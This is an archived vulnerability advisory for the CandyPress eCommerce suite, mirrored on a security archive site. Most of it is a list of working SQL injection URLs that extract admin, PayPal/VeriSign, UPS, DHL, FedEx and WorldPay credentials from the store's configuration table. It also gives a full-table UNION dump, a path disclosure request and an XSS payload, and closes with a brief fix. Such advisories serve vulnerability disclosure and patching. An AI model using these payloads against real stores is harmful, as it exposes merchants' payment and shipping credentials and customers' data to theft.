Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: bx1619.htm

eCommerce suite (SQL Injection + XSS + Path Disclosure)



eCommerce suite (SQL Injection + XSS + Path Disclosure)
eCommerce suite (SQL Injection + XSS + Path Disclosure)



########################## WwW.BugReport.ir ###########################################=0D 
#=0D
#      AmnPardaz Security Research & Penetration Testing Group=0D
#=0D
# Title: [CandyPress] eCommerce suite=0D
# Vendor: http://www.candypress.com/=0D 
# Bugs: SQL Injection + XSS + Path Disclosure in CandyPress=0D
# Vulnerable Version: 4.1.1.26=0D
# Exploit: Available=0D
# Fix Available: Yes!, Update to 4.1.1.27 (http://www.candypress.com/CPforum/forum_posts.asp?TID=10630&PN=1) (There is a fast solution too)=0D 
###################################################################################=0D
=0D
####################=0D
- Description:=0D
####################=0D
The CandyPress eCommerce suite acts as the command center of your online store. Powerful and versatile, yet easy to use and intuitive, it enables you to easily manage and administrate your orders, product catalog, shipping rates, locations, product reviews, customers and much more.=0D
=0D
####################=0D
- Vulnerability:=0D
####################=0D
Remote user can see all databases fields (there are a lot of encrypted credit cards), also there are XSS and Path Disclosure bugs too.=0D
=0D
POC:=0D
----=0D
Find Version:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='storeVersion'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
Local Setup IP:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='excludeIP'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
Admin Email:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='pEmailAdmin'%20or%20'2'='1&action=get&inventory=1=0D 
Admin Email Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='pEmailAdminPassword'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
Direct Username:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectUserName'%20or%20'2'='1&action=get&inventory=1=0D 
Direct Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectPassword'%20or%20'2'='1&action=get&inventory=1=0D 
Direct Signature:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectSignature'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
pp Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppPassword'%20or%20'2'='1&action=get&inventory=1=0D 
ppUsername:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppUserName'%20or%20'2'='1&action=get&inventory=1=0D 
ppSignature:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppSignature'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
UPS UserID:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSUserID'%20or%20'2'='1&action=get&inventory=1=0D 
UPS Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSPassword'%20or%20'2'='1&action=get&inventory=1=0D 
UPS Access ID:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSAccessID'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
PayPal ... Login:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignLogin'%20or%20'2'='1&action=get&inventory=1=0D 
PayPal ... Partner:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignPartner'%20or%20'2'='1&action=get&inventory=1=0D 
PayPal ... Passowrd:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignPassword'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
WorldPay Call Back Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='WorldPayCallbackPW'%20or%20'2'='1&action=get&inventory=1=0D 
WorldPay SID:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='WorldPayOutSID'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
DHL Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='DHLPassword'%20or%20'2'='1&action=get&inventory=1=0D 
DHL UserID:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='DHLUserID'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
Fedex Password:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='FEDEXPassword'%20or%20'2'='1&action=get&inventory=1=0D 
Fedex UserID:=0D
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='FEDEXUserID'%20or%20'2'='1&action=get&inventory=1=0D 
----=0D
Admin Email Password:=0D
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVar%20as%20configHelp%20from%20storeAdmin%20where%20('1'='1=0D 
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVal%20as%20configHelp%20from%20storeAdmin%20where%20configVar='pEmailAdmin'%20or%20('1'='2=0D 
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVal%20as%20configHelp%20from%20storeAdmin%20where%20configVar='pEmailAdminPassword'%20or%20('1'='2=0D 
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVar%20as%20configHelp%20from%20storeAdmin%20where%20('1'='1=0D 
----=0D
Full data disclosure:=0D
http://[CandyPressURL]/ajax/ajax_getBrands.asp?recid=1%20or%201=1%20union%20select%20configVal,configVar%20from%20storeAdmin=0D 
----=0D
Path Disclosure:=0D
http://[CandyPressURL]/admin/SA_shipFedExMeter.asp?FedExAccount=admin=0D 
---=0D
XSS Bug:=0D
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=%3Cscript%3Ealert('BugReport.IR from amnpardaz')%3C/script%3E=0D 
=0D
####################=0D
- Fast Solution :=0D
####################=0D
1- Rename "/Admin" and "/Ajax" directories.=0D
2- Rename (or delete) dangerous files which are:=0D
	/ajax/ajax_optInventory.asp=0D
	/ajax/ajax_getBrands.asp=0D
	/admin/utilities_ConfigHelp.asp=0D
	/admin/SA_shipFedExMeter.asp=0D
	=0D
####################=0D
- Credit :=0D
####################=0D
AmnPardaz Security Research & Penetration Testing Group=0D
Contact: admin[4t}bugreport{d0t]ir=0D
WwW.BugReport.ir=0D 
WwW.AmnPardaz.com=0D 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH